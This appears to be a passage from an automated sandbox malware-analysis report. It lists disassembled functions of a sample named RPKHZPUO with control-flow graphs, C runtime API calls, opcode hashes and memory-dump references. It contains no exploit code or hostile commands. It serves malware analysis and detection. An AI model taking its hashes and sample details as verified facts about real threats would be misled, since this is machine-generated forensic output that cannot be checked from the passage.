                                                                                                                                      • Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                      • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                      • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
                                                                                                                                      • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                      • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
                                                                                                                                      Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 357 417081-4170a0 358 4170a2-4170bb LCMapStringW 357->358 359 4170da-4170dd 357->359 360 4170c5-4170ce GetLastError 358->360 361 4170bd-4170c3 358->361 362 417101-417109 359->362 363 4170df-4170e2 359->363 360->359 366 4170d0 360->366 361->359 364 4172bb-4172c4 362->364 365 41710f-417111 362->365 367 4170e5-4170e8 363->367 369 4172c6-4172cb 364->369 370 4172ce-4172d1 364->370 365->364 368 417117-41711a 365->368 366->359 371 4170f2-4170fb 367->371 372 4170ea-4170ed 367->372 375 417120-417126 368->375 376 4172ec-4172ee 368->376 369->370 377 4172d3-4172d8 370->377 378 4172db-4172ea call 417a20 370->378 373 4170fd 371->373 374 4170fe 371->374 372->367 379 4170ef 372->379 373->374 374->362 380 417130-417157 MultiByteToWideChar 375->380 381 417128-41712d 375->381 383 417414-41741d 376->383 377->378 378->376 390 4172f3-4172f6 378->390 379->371 380->376 384 41715d 380->384 381->380 385 41741f call 40ce09 383->385 387 4171a2 384->387 388 41715f-417169 384->388 389 417424-417425 385->389 391 4171a5-4171a8 387->391 388->387 392 41716b-417174 388->392 393 4173d7-4173ef LCMapStringA 390->393 394 4172fc-417316 call 417a69 390->394 391->376 396 4171ae-4171c1 MultiByteToWideChar 391->396 397 417176-41717f call 40cfb0 392->397 398 417189-417192 call 40b84d 392->398 399 4173f1-4173f4 393->399 394->376 408 417318-417331 LCMapStringA 394->408 402 4171c7-4171e2 LCMapStringW 396->402 403 4172aa-4172b6 call 4147ae 396->403 417 41719d-4171a0 397->417 424 417181-417187 397->424 416 417194 398->416 398->417 405 4173f6-4173fe call 40b6b5 399->405 406 4173ff-417404 399->406 402->403 412 4171e8-4171ef 402->412 403->383 405->406 409 417412 406->409 410 417406-417409 406->410 418 417333-417335 408->418 419 41733a 408->419 409->383 410->409 420 41740b-417411 call 40b6b5 410->420 422 4171f1-4171f4 412->422 423 41721a-41721c 412->423 425 41719a 416->425 417->391 418->399 427 417379 419->427 428 41733c-41733f 419->428 420->409 422->403 429 4171fa-4171fd 422->429 430 417263 423->430 431 41721e-417228 423->431 424->425 425->417 432 41737b-41737d 427->432 428->427 434 417341-417349 428->434 429->403 436 417203-417215 LCMapStringW 429->436 435 417265-417267 430->435 431->430 437 41722a-417233 431->437 432->418 440 41737f-4173a3 call 40ba30 LCMapStringA 432->440 441 417361-41736a call 40b84d 434->441 442 41734b-417354 call 40cfb0 434->442 435->403 443 417269-41727f LCMapStringW 435->443 436->403 438 417235-41723e call 40cfb0 437->438 439 41724b-417254 call 40b84d 437->439 438->403 460 417240-417249 438->460 463 417256-41725c 439->463 464 41725f-417261 439->464 461 4173a5-4173a7 440->461 462 4173a9-4173cb call 417a69 440->462 466 417375-417377 441->466 467 41736c-417372 441->467 442->418 465 417356-41735f 442->465 449 417281-417286 443->449 450 4172a3-4172a9 call 4147ae 443->450 457 417288-41728a 449->457 458 41728c-41728f 449->458 450->403 468 417292-4172a0 WideCharToMultiByte 457->468 458->468 460->435 469 4173ce-4173d5 call 4147ae 461->469 462->469 463->464 464->435 465->432 466->432 467->466 468->450 469->399
                                                                                                                                      APIs
                                                                                                                                      • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                                      • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,00000000), ref: 004170C5
                                                                                                                                      • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                                      • _malloc.LIBCMT ref: 0041718A
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                                      • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                                      • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                                      • _malloc.LIBCMT ref: 0041724C
                                                                                                                                      • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                                      • __freea.LIBCMT ref: 004172A4
                                                                                                                                      • __freea.LIBCMT ref: 004172AD
                                                                                                                                      • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                                      • ___convertcp.LIBCMT ref: 00417309
                                                                                                                                      • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                                      • _malloc.LIBCMT ref: 00417362
                                                                                                                                      • _memset.LIBCMT ref: 00417384
                                                                                                                                      • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                                      • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                                      • __freea.LIBCMT ref: 004173CF
                                                                                                                                      • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3809854901-0
                                                                                                                                      • Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                                      • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                                      • Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                                      • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                                      Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 474 4057b0-4057cd 475 4057d3-4057d5 474->475 476 4059c6-4059ce 474->476 475->476 477 4057db-4057ea call 40b84d 475->477 480 4057f0-405834 call 403080 477->480 481 405921-40592a 477->481 484 405837-40583c 480->484 484->484 485 40583e-40584f call 40b84d 484->485 488 405855-40585b 485->488 489 40591c call 405160 485->489 491 405860-405868 488->491 489->481 491->491 492 40586a-40586f 491->492 493 405870-405872 492->493 494 405874 493->494 495 405877-40587b 493->495 494->495 496 405881 495->496 497 40587d-40587f 495->497 498 405885-405889 496->498 497->496 497->498 499 405897-405899 498->499 500 40588b-40588d 498->500 502 4058a5-4058a7 499->502 503 40589b-4058a3 499->503 500->499 501 40588f-405895 500->501 504 4058cc-4058cf 501->504 505 4058b3-4058b5 502->505 506 4058a9-4058b1 502->506 503->504 507 4058d1-4058d9 504->507 508 4058db-4058e0 504->508 509 4058c1-4058c8 505->509 510 4058b7-4058bf 505->510 506->504 507->493 507->508 508->489 511 4058e2-4058e4 508->511 509->504 510->504 512 4058e6-405916 call 404ce0 call 40b84d 511->512 513 40592b-40594e call 40b84d call 4071a0 511->513 512->489 523 405918-40591a 512->523 513->489 522 405950-405953 513->522 522->489 524 405955-40596e call 40bfc1 522->524 523->489 523->524 527 405970-40597a call 40cb9d 524->527 528 40597c-40597d call 40c953 524->528 532 405982-40598a 527->532 528->532 532->489 533 40598c-405990 532->533 534 405992-4059a2 533->534 535 4059a3-4059c5 call 405000 call 40c8e5 533->535
                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 004057DE
                                                                                                                                        • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                        • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                        • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                      • _malloc.LIBCMT ref: 00405842
                                                                                                                                      • _malloc.LIBCMT ref: 00405906
                                                                                                                                      • _malloc.LIBCMT ref: 00405930
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _malloc$AllocateHeap
                                                                                                                                      • String ID: 1.2.3
                                                                                                                                      • API String ID: 680241177-2310465506
                                                                                                                                      • Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                      • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                                      • Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                      • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                                      Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 540 40bcc2-40bcde 541 40bce0-40bce3 540->541 542 40bd01 540->542 541->542 544 40bce5-40bce7 541->544 543 40bd03-40bd07 542->543 545 40bd08-40bd0d 544->545 546 40bce9-40bcf8 call 40bfc1 544->546 547 40bd1c-40bd1f 545->547 548 40bd0f-40bd1a 545->548 558 40bcf9-40bcfe call 40e744 546->558 551 40bd21-40bd29 call 40ba30 547->551 552 40bd2c-40bd2e 547->552 548->547 550 40bd3d-40bd50 548->550 556 40bd52-40bd58 550->556 557 40bd5a 550->557 551->552 552->546 555 40bd30-40bd3b 552->555 555->546 555->550 561 40bd61-40bd63 556->561 557->561 558->542 562 40be53-40be56 561->562 563 40bd69-40bd70 561->563 562->543 565 40bd72-40bd77 563->565 566 40bdb6-40bdb9 563->566 565->566 567 40bd79 565->567 568 40be23-40be2d call 40fc07 566->568 569 40bdbb-40bdbf 566->569 570 40beb4 567->570 571 40bd7f-40bd83 567->571 582 40beb8-40bec1 568->582 587 40be33-40be37 568->587 573 40bde0-40bde7 569->573 574 40bdc1-40bdca 569->574 570->582 577 40bd85 571->577 578 40bd87-40bd8a 571->578 575 40bde9 573->575 576 40bdeb-40bdee 573->576 580 40bdd5-40bdda 574->580 581 40bdcc-40bdd3 574->581 575->576 583 40bdf4-40be0a call 40fa20 call 4102f4 576->583 584 40be87-40be8b 576->584 577->578 585 40bd90-40bdb1 call 4103f1 578->585 586 40be5b-40be61 578->586 588 40bddc-40bdde 580->588 581->588 582->543 609 40be10-40be13 583->609 610 40bec6-40beca 583->610 593 40be9d-40beaf call 40bfc1 584->593 594 40be8d-40be9a call 40ba30 584->594 602 40be4b-40be4d 585->602 589 40be72-40be82 call 40bfc1 586->589 590 40be63-40be6f call 40ba30 586->590 587->584 595 40be39-40be48 587->595 588->576 589->558 590->589 593->558 594->593 595->602 602->562 602->563 609->570 611 40be19-40be21 609->611 610->582 611->602
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3886058894-0
                                                                                                                                      • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                      • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                                      • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                      • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                                      Function 004017E0 Relevance: 10.6, APIs: 7, Instructions: 50COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 612 4017e0-4017e7 613 4017f3-4017f9 612->613 614 4017e9-4017ee EntryPoint 612->614 615 401805-40180c 613->615 616 4017fb-401800 EntryPoint 613->616 614->613 617 401818-40181c 615->617 618 40180e-401813 EntryPoint 615->618 616->615 619 401858-40185c 617->619 620 40181e-401822 617->620 618->617 621 401847 619->621 622 40185e-401866 call 40b743 619->622 623 401824-401832 call 40b783 620->623 624 40183e-401844 call 40b6b5 620->624 628 401849-40184c 621->628 634 401869-40186b 622->634 623->634 635 401834-401839 EntryPoint 623->635 624->621 632 40186d-40186f 628->632 633 40184e-401853 EntryPoint 628->633 633->619 634->628 635->624
                                                                                                                                      APIs
                                                                                                                                      • EntryPoint.RPKHZPUO(80070057), ref: 004017EE
                                                                                                                                        • Part of subcall function 00401030: RaiseException.KERNEL32(?,00000001,00000000,00000000,00000015,-30B19E70,2C2D8410), ref: 0040101C
                                                                                                                                        • Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030
                                                                                                                                      • EntryPoint.RPKHZPUO(80070057), ref: 00401800
                                                                                                                                      • EntryPoint.RPKHZPUO(80070057), ref: 00401813
                                                                                                                                      • __recalloc.LIBCMT ref: 00401828
                                                                                                                                      • EntryPoint.RPKHZPUO(8007000E), ref: 00401839
                                                                                                                                      • EntryPoint.RPKHZPUO(8007000E), ref: 00401853
                                                                                                                                      • _calloc.LIBCMT ref: 00401861
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1721462702-0
                                                                                                                                      • Opcode ID: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                                                                      • Instruction ID: 9b44c07ae4757e317c030d83b628f3e382e80143504443e1f3b2735d650bea0f
                                                                                                                                      • Opcode Fuzzy Hash: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                                                                      • Instruction Fuzzy Hash: AC018872500241EACA21BA229C06F1B7294DF90799F24893FF4C5762E2D63D9990D6EE
                                                                                                                                      Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __getptd.LIBCMT ref: 00414744
                                                                                                                                        • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                        • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                      • __getptd.LIBCMT ref: 0041475B
                                                                                                                                      • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                                      • __lock.LIBCMT ref: 00414779
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                      • String ID: @.B
                                                                                                                                      • API String ID: 3521780317-470711618
                                                                                                                                      • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                      • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                                                                      • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                      • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                                                      Function 0040C73D Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                                      • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                                      • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                                      • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                                      • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2805327698-0
                                                                                                                                      • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                      • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                                      • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                      • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                                      Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __getptd.LIBCMT ref: 00413FD8
                                                                                                                                        • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                        • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                      • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                                      • __lock.LIBCMT ref: 00414008
                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                                      • InterlockedIncrement.KERNEL32(00422910), ref: 00414050
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4271482742-0
                                                                                                                                      • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                      • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                                      • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                      • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                                      Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                      • API String ID: 1646373207-3105848591
                                                                                                                                      • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                      • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                                      • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                      • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                                      Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __fileno.LIBCMT ref: 0040C77C
                                                                                                                                      • __locking.LIBCMT ref: 0040C791
                                                                                                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2395185920-0
                                                                                                                                      • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                      • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                                                                      • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                      • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                                                                      Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _fseek_malloc_memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 208892515-0
                                                                                                                                      • Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                      • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                                      • Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                      • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                                      Function 0040BAAA Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __flush.LIBCMT ref: 0040BB6E
                                                                                                                                      • __fileno.LIBCMT ref: 0040BB8E
                                                                                                                                      • __locking.LIBCMT ref: 0040BB95
                                                                                                                                      • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
